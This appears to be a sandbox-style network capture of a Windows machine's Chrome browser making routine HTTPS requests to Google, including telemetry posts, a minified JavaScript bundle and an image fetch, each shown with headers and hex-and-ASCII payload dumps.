Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49804	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:35 UTC	1606	OUT	POST /gen_204?atyp=csi&ei=TlhbZ4aoKai8xc8Pg5KPuQc&s=async&astyp=hpba&ima=0&imn=0&mem=ujhs.9,tjhs.12,jhsl.2173,dm.8&nv=ne.1,feid.b982ac60-12df-490b-a613-81ce59c66048&hp=&rt=ttfb.3103,st.3104,bs.27,aaft.3105,acrt.3106,art.3106&zx=1734039630514&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:36 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-mXt-P7rBMTKFH2CckV7d5w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 12 Dec 2024 21:40:36 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49806	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:36 UTC	1118	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 911 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: https://www.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:36 UTC	911	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 34 30 33 39 36 33 32 30 37 38 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1734039632078",null,null,null,
2024-12-12 21:40:37 UTC	494	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://www.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:40:36 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:40:37 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-12 21:40:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.5	49816	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:37 UTC	1301	OUT	GET /xjs/_/js/k=xjs.hd.en_US.8fCINjS4xE8.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAKAAAAAABAAAAAAEAAAAAAAAAAgCAAQBAEAAAACABQAAggFAAAAAAQAACADgUaYACBABAAAAABAAQABhAQAABAAAAAIAAAAAAAAKAAAAAAACAAAAAAAAAAAIEAAAAAAAAAAAACAAAAA9AAAAAAAAAEBAAACwBDxAAAAAAAAAoA8AggdgSGEBAAAAAAAAAAAAAAAgQIJgLiQgIAABAAAAAAAAAAAAAAAAAESauLAB/d=0/dg=0/br=1/rs=ACT90oHD0flIQ57P5bixJ1n-UlGGuvyEgw/m=syt5,syt4,VsqSCc,sy1b7,P10Owf,sy19z,sy19x,sysj,gSZvdb,syyf,syye,WlNQGd,sysn,sysl,sysk,sysi,DPreE,syys,syyq,nabPbb,syy9,syy7,sylx,sypx,CnSW2d,kQvlef,syyr,fXO0xe?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:38 UTC	825	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 29656 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 12 Dec 2024 21:40:30 GMT Expires: Fri, 12 Dec 2025 21:40:30 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 12 Dec 2024 19:52:52 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 7 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:40:38 UTC	565	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 61 65 63 3d 5f 2e 4d 64 28 22 56 73 71 53 43 63 22 2c 5b 5d 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 57 64 63 3b 5f 2e 59 64 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 57 64 63 28 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 64 69 61 6c 6f 67 2f 73 68 61 72 65 22 2c 7b 61 70 70 5f 69 64 3a 22 37 33 38 30 32 36 34 38 36 33 35 31 37 39 31 22 2c 68 72 65 66 3a 5f 2e 58 64 63 28 61 29 2c 68 61 73 68 74 61 67 3a 22 23 47 6f 6f 67 6c 65 44 6f 6f 64 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.aec=_.Md("VsqSCc",[]);}catch(e){_._DumpException(e)}try{var Wdc;_.Ydc=function(a){return Wdc("https://www.facebook.com/dialog/share",{app_id:"738026486351791",href:_.Xdc(a),hashtag:"#GoogleDood
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 61 2e 74 6f 53 74 72 69 6e 67 28 29 7d 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 79 28 22 56 73 71 53 43 63 22 29 3b 0a 76 61 72 20 62 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 31 21 3d 61 2e 51 67 62 26 26 5f 2e 77 6f 62 28 61 2c 21 30 29 7d 2c 63 65 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 2e 65 77 62 3d 21 31 3b 5f 2e 78 6f 62 28 61 2c 21 31 29 7d 2c 64 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 5f 2e 59 64 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 61 3d 74 68 69 73 3b 74 68 69 73 2e 64 69 61 6c 6f 67 3d 6e 65 77 20 5f 2e 79 73 28 22 64 64 6c 73 68 61 72 65 2d 64 69 61 6c 6f 67 22 29 3b 74 68 69 73 2e 64 69 61 6c 6f 67 2e 65 4b 61 28 21 31 29 3b 5f 2e 41 6f 62 28 Data Ascii: a.toString()};}catch(e){_._DumpException(e)}try{_.y("VsqSCc");var bec=function(a){1!=a.Qgb&&_.wob(a,!0)},cec=function(a){a.ewb=!1;_.xob(a,!1)},dec=function(){_.Yd.call(this);var a=this;this.dialog=new _.ys("ddlshare-dialog");this.dialog.eKa(!1);_.Aob(
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 73 2e 41 61 3d 66 3b 74 68 69 73 2e 77 61 3d 67 3b 74 68 69 73 2e 64 69 61 6c 6f 67 2e 73 65 74 54 69 74 6c 65 28 74 68 69 73 2e 74 69 74 6c 65 29 7d 3b 5f 2e 47 28 65 65 63 2c 64 65 63 29 3b 65 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 72 63 2e 63 61 6c 6c 28 74 68 69 73 29 7d 3b 0a 65 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 64 65 63 2e 70 72 6f 74 6f 74 79 70 65 2e 73 68 6f 77 2e 63 61 6c 6c 28 74 68 69 73 29 3b 76 61 72 20 61 3d 74 68 69 73 2c 62 3d 74 68 69 73 2e 64 69 61 6c 6f 67 2e 64 4d 28 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 2e 64 64 6c 73 2d 74 65 78 74 22 29 3b 62 26 26 28 62 2e 76 61 6c 75 Data Ascii: s.Aa=f;this.wa=g;this.dialog.setTitle(this.title)};_.G(eec,dec);eec.prototype.rc=function(){dec.prototype.rc.call(this)};eec.prototype.show=function(){dec.prototype.show.call(this);var a=this,b=this.dialog.dM().querySelector("input.ddls-text");b&&(b.valu
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 2e 41 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4f 61 29 3b 69 66 28 61 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 23 68 70 6c 6f 67 6f 20 69 6d 67 22 29 7c 7c 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6d 67 23 68 70 6c 6f 67 6f 22 29 29 7b 61 3d 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 69 74 6c 65 22 29 7c 7c 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 61 6c 74 22 29 3b 76 61 72 20 62 3d 61 2b 22 20 23 47 6f 6f 67 6c 65 44 6f 6f 64 6c 65 22 2c 63 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6d 65 74 61 5b 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 5d 27 29 3b 63 26 26 28 62 3d 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 Data Ascii: .A.call(this,a.Oa);if(a=document.querySelector("#hplogo img")\|\|document.querySelector("img#hplogo")){a=a.getAttribute("title")\|\|a.getAttribute("alt");var b=a+" #GoogleDoodle",c=document.querySelector('meta[property="og:description"]');c&&(b=c.getAttribute
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 2c 31 29 2e 6c 6f 67 28 21 30 29 7d 3b 70 45 2e 70 72 6f 74 6f 74 79 70 65 2e 77 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 61 2e 64 61 74 61 3f 62 3d 5f 2e 6b 63 28 5f 2e 56 44 2c 61 2e 64 61 74 61 29 3a 62 3d 6e 65 77 20 5f 2e 56 44 3b 62 74 64 28 74 68 69 73 2c 62 29 7d 3b 70 45 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 62 74 64 28 74 68 69 73 2c 61 2e 64 61 74 61 29 7d 3b 0a 76 61 72 20 62 74 64 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3b 28 62 3d 3d 6e 75 6c 6c 3f 30 3a 62 2e 5a 4a 28 29 29 26 26 28 28 63 3d 61 2e 64 61 74 61 29 3d 3d 6e 75 6c 6c 3f 30 3a 63 2e 5a 4a 28 29 29 26 26 28 62 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 62 2e 5a 4a 28 29 29 21 3d 3d 61 2e 64 61 74 61 2e Data Ascii: ,1).log(!0)};pE.prototype.wa=function(a){var b;a.data?b=_.kc(_.VD,a.data):b=new _.VD;btd(this,b)};pE.prototype.oa=function(a){btd(this,a.data)};var btd=function(a,b){var c;(b==null?0:b.ZJ())&&((c=a.data)==null?0:c.ZJ())&&(b==null?void 0:b.ZJ())!==a.data.
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 22 7d 3b 5f 2e 47 28 51 6e 64 2c 5f 2e 41 29 3b 51 6e 64 2e 48 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 6a 73 64 61 74 61 3a 7b 74 47 61 3a 5f 2e 56 44 7d 7d 7d 3b 51 6e 64 2e 70 72 6f 74 6f 74 79 70 65 2e 6f 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 2e 42 61 29 72 65 74 75 72 6e 21 30 3b 52 6e 64 28 74 68 69 73 29 3b 72 65 74 75 72 6e 21 31 7d 3b 51 6e 64 2e 70 72 6f 74 6f 74 79 70 65 2e 41 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 62 63 28 74 68 69 73 2e 64 61 74 61 2c 5f 2e 52 44 2c 31 34 2c 61 2e 64 61 74 61 29 3b 52 6e 64 28 74 68 69 73 29 7d 3b 0a 76 61 72 20 52 6e 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 78 71 28 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 29 3b 5f 2e 4f 6e 64 28 22 66 73 22 29 Data Ascii: "};_.G(Qnd,_.A);Qnd.Ha=function(){return{jsdata:{tGa:_.VD}}};Qnd.prototype.oa=function(){if(this.Ba)return!0;Rnd(this);return!1};Qnd.prototype.Aa=function(a){_.bc(this.data,_.RD,14,a.data);Rnd(this)};var Rnd=function(a){_.xq(a.getRoot().el());_.Ond("fs")
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 3d 76 6f 69 64 20 30 3f 21 31 3a 62 3b 28 61 3d 74 68 69 73 2e 57 4a 28 29 2e 66 69 6e 64 28 61 29 29 26 26 74 68 69 73 2e 77 61 28 61 2c 62 29 7d 3b 5f 2e 6d 2e 57 4a 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2c 62 3d 5b 5d 2e 63 6f 6e 63 61 74 28 5f 2e 6a 64 28 74 68 69 73 2e 42 62 28 22 4e 4e 4a 4c 75 64 22 29 2e 74 6f 41 72 72 61 79 28 29 29 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 64 29 7b 72 65 74 75 72 6e 21 61 2e 6b 61 28 64 29 2e 50 56 61 28 29 7d 29 2c 63 3d 5f 2e 78 6f 28 74 68 69 73 2c 22 74 71 70 37 75 64 22 29 2e 65 6c 28 29 3b 63 26 26 62 2e 70 75 73 68 28 63 29 3b 72 65 74 75 72 6e 20 62 7d 3b 5f 2e 6d 2e 56 44 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 56 6b 61 7d 3b 0a Data Ascii: =void 0?!1:b;(a=this.WJ().find(a))&&this.wa(a,b)};_.m.WJ=function(){var a=this,b=[].concat(_.jd(this.Bb("NNJLud").toArray())).filter(function(d){return!a.ka(d).PVa()}),c=_.xo(this,"tqp7ud").el();c&&b.push(c);return b};_.m.VDc=function(){return this.Vka};
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 63 28 61 2c 64 2c 21 30 2c 63 29 3b 62 72 65 61 6b 3b 63 61 73 65 20 35 3a 61 3d 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 62 66 28 61 2c 5f 2e 58 4c 63 29 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 67 4d 63 28 61 2c 64 2c 21 31 2c 63 29 7d 64 2e 69 73 53 65 6c 65 63 74 65 64 28 29 7d 7d 2c 67 4d 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 61 3d 61 2e 67 65 74 52 6f 6f 74 28 29 2e 65 6c 28 29 3b 5f 2e 62 66 28 61 2c 5f 2e 57 4c 63 2c 6e 65 77 20 61 4d 63 28 62 2c 63 2c 64 29 29 7d 3b 5f 2e 6d 3d 5f 2e 43 41 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 62 70 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 41 61 7d 3b 5f 2e 6d 2e 69 45 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 Data Ascii: c(a,d,!0,c);break;case 5:a=a.getRoot().el();_.bf(a,_.XLc);break;default:gMc(a,d,!1,c)}d.isSelected()}},gMc=function(a,b,c,d){a=a.getRoot().el();_.bf(a,_.WLc,new aMc(b,c,d))};_.m=_.CA.prototype;_.m.bp=function(){return this.Aa};_.m.iEc=function(){return th
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 72 65 6e 74 28 29 3b 76 61 72 20 64 3b 72 65 74 75 72 6e 28 28 64 3d 61 2e 65 6c 28 29 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 74 61 67 4e 61 6d 65 29 3d 3d 3d 0a 22 47 2d 4d 45 4e 55 2d 49 54 45 4d 22 3f 61 2e 65 6c 28 29 3a 6e 75 6c 6c 7d 3b 5f 2e 6d 3d 5f 2e 43 41 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 74 4a 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 68 4d 63 28 61 29 3b 69 66 28 62 29 7b 76 61 72 20 63 3d 61 2e 65 76 65 6e 74 3b 28 63 3d 63 3f 63 2e 77 68 69 63 68 7c 7c 63 2e 6b 65 79 43 6f 64 65 3a 6e 75 6c 6c 29 26 26 63 3d 3d 3d 33 32 3f 74 68 69 73 2e 62 72 62 28 61 29 3a 66 4d 63 28 74 68 69 73 2c 62 2c 21 30 29 7d 7d 3b 5f 2e 6d 2e 4c 35 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6f 61 3d 3d 3d 6e 75 Data Ascii: rent();var d;return((d=a.el())==null?void 0:d.tagName)==="G-MENU-ITEM"?a.el():null};_.m=_.CA.prototype;_.m.tJc=function(a){var b=hMc(a);if(b){var c=a.event;(c=c?c.which\|\|c.keyCode:null)&&c===32?this.brb(a):fMc(this,b,!0)}};_.m.L5b=function(){this.oa===nu
2024-12-12 21:40:38 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6f 61 2c 64 3d 61 2e 57 4a 28 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 5f 2e 6f 6d 28 65 29 7d 29 3b 63 3d 3d 3d 6e 75 6c 6c 26 26 28 61 2e 6d 65 6e 75 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3d 3d 3d 22 30 22 7c 7c 64 2e 6c 65 6e 67 74 68 3e 30 26 26 64 5b 30 5d 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 74 61 62 69 6e 64 65 78 22 29 3d 3d 3d 22 30 22 29 26 26 28 63 3d 62 3f 5f 2e 79 61 28 64 29 3a 64 5b 30 5d 29 3b 63 26 26 28 61 3d 64 2e 66 69 6e 64 49 6e 64 65 78 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 3d 3d 3d 65 7d 29 2c 64 3d 5f 2e 59 6e 62 28 64 2c 62 3f 2d 61 2d 31 3a 2d 61 29 2c Data Ascii: function(a,b){var c=a.oa,d=a.WJ().filter(function(e){return _.om(e)});c===null&&(a.menu.getAttribute("tabindex")==="0"\|\|d.length>0&&d[0].getAttribute("tabindex")==="0")&&(c=b?_.ya(d):d[0]);c&&(a=d.findIndex(function(e){return c===e}),d=_.Ynb(d,b?-a-1:-a),

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.5	49817	142.250.181.132	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:40:37 UTC	802	OUT	GET /images/hpp/ic_wahlberg_product_core_48.png8.png HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:40:38 UTC	671	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Type: image/png Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 2091 Date: Thu, 12 Dec 2024 21:40:38 GMT Expires: Thu, 12 Dec 2024 21:40:38 GMT Cache-Control: private, max-age=31536000 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
